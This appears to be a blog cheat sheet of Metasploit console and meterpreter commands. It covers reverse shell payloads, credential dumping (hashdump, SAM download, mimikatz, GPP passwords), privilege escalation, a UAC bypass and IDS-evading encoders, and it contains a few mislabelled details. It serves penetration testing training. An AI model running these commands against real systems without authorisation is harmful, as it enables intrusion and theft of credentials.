Home Hacking MetaSploit Commands and Meterpreter Payloads
Hacking

MetaSploit Commands and Meterpreter Payloads

Metasploit framework is one of the most advanced and one of the favorite tool for pen testers and security researchers. It was developed by the H.D. Moore in Perl language which later in 2007 was revised in Ruby completely. With it’s high success and demand in security researchers and pen-testers, in 2009, MetaSploit was acquired by the Rapid7 a well known security researcher company.  Learn most commonly used metasploit commands in this metasploit for beginners guide.

Metasploit is a complete tools suite for penetration testers and hackers as it’s pre-packaged with all the pen-testing tools for hacking into a remote machine and web applications. It’s one of the most advanced tool for hackers and reseachers. MetaSploit is a very large framework that each of it’s module have tons of actions one can perform. To make it easier for new users, we have listed some of the most commonly used metasploit commands meterpreter payloads you can practice and perform.

MetaSploit for Beginners

There’s three types of Metasploit commands.

  1. Basic commands (These are the very basic operation commands like search, help, info and exit.)
  2. Exploit commands (Exploit commands are the ones used to check out all the exploit options, payloads and targets.)
  3. Exploit execution commands (These are post exploit commands that exploits and execute different operations on a target machine.)

Related: Kali Linux for Android

All the most commonly used and Metasploit BasicExploit and Exploit Execuation commands for beginners to learn are:

  • First of all, to update the Metasploit framework to it’s latest version. Execute the following command.
apt update; apt install metasploit-framework
  • To check out all the msfconsole and metasploit options, use the following help command.
msfconsole/help
  • Metasploit search command is used to search for exploits and vulnerabilities from msfconsole.
search
  • To see a list of all the payload options to attack a target machine.
show options
  • The following command is used to check and set listening IP and PORT of the HOST machine to set a static IP and port forwarding to any specified port.
LHOST
LPORT
  • To check out the list all the payloads for an exploit.
show payloads
  • To find all the vulnerable operating systems to a specified exploit.
show targets
  • To show advanced options and commands for exploit.
show advanced
  • Show encoders command returns all the encoders. Encoders used for evading simple IDS/IPS signatures that are looking for certain bytes of your payload.
show encoders
  • This command will give a list of Nop generators. It is used to change the pattern of a NOP sled in order to bypass simple IDS/IPS signatures of common NOP.
show nops

MetaSploit Command & Meterpreter Payloads

Windows Reverse Meterpreter Payload

CommandDescription
set payload windows/meterpreter/reverse_tcpUsed for Reverse TCP Windows Payload

Android Reverse Meterpreter Payload

CommandDescription
set payload android/meterpreter/reverse_tcpUsed for Reverse TCP Android Payload

Windows VNC Meterpreter Payload

CommandDescription
set payload windows/vncinject/reverse_tcpset ViewOnly falseUsed for Reverse TCP Windows VNC Payload

Linux Reverse Meterpreter Payload

CommandDescription
set payload linux/meterpreter/reverse_tcpUsed for Reverse TCP Linux Payload

Meterpreter Commands

Check out the most useful and commonly used meterpreter commands.

CommandDescription
upload file c:\windowsMeterpreter command for uploading file to a Windows OS target machine.
download c:\windows\repair\sam /tmpMeterpreter command for downloading file from a Windows OS target device.
execute -f c:\windowstempexploit.exeTo execute exploits on a remote victim machine.
execute -f cmd -cTo create a new channel with cmd shell.
psShows all the Meterpreter processes.
shellMeterpreter get shell on the target.
getsystemThis meterpreter command attempts the priviledge escalation on the target device.
hashdumpIt is used to dump hashes on the target system.
portfwd add –l 3389 –p 3389 –r targetMeterpreter command for port forwarding to victim machine.
portfwd delete –l 3389 –p 3389 –r targetMeterpreter removes port forwarding.

MetaSploit Exploits

Explore all of the most commonly used metasploit exploits.

Remote Windows MetaSploit Exploits

All the exploits for attacking a WindowsOS machines remotely.

CommandDescription
use exploit/windows/smb/ms08_067_netapiRemote Exploit for the machines with Windows versions MS08_067 Windows 2k, XP, 2003
use exploit/windows/dcerpc/ms06_040_netapiRemote Exploit for the machines with Windows versions MS08_040 Windows NT, 2k, XP, 2003
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
Remote Exploit for the machines with Windows versions MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86)

Post Exploit Windows Metasploit Modules

CommandDescription
run post/windows/gather/win_privsMetasploit command to show all the privileges and permissions of the current user.
use post/windows/gather/credentials/gppThis Metasploit command grabs all GPP saved passwords.
load mimikatz -> wdigestMetasplit loads Mimikatz.
run post/windows/gather/local_admin_search_enumSearches all machines with administrative access.

Local Windows MetaSploit Exploits

Exploits to work with a local machine.

CommandDescription
use exploit/windows/local/bypassuacUsed for UAC (User Account Control) Bypass on Windows 7 systems.

Auxilary MetaSploit Modules

CommandDescription
use auxiliary/scanner/http/dir_scannerMetasploit scanner tool used to scan HTTP directory.
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS used for vulnerability scanning.
use auxiliary/scanner/mssql/mssql_loginMetasploit Credential Scanner tool used for MSSQL.
use auxiliary/scanner/oracle/oracle_loginMetasploit scanner used for Oracle Login Module.

Metasploit Powershell Exploits

CommandDescription
use exploit/multi/script/web_deliveryMetasploit shell payload delivery exploit.
post/windows/manage/powershell/exec_powershellUploads the shell to target and run powershell.
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy.
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload.

There’s hundreds of more actions and commands you can play with, but these are the most commonly used Metasploit commands for taking over a computer, smartphone, web apps and more. Hope this metasploit for beginners guide would be useful for you to learn working with MetaSploit.

Author

Silence Dogood

Leave a Reply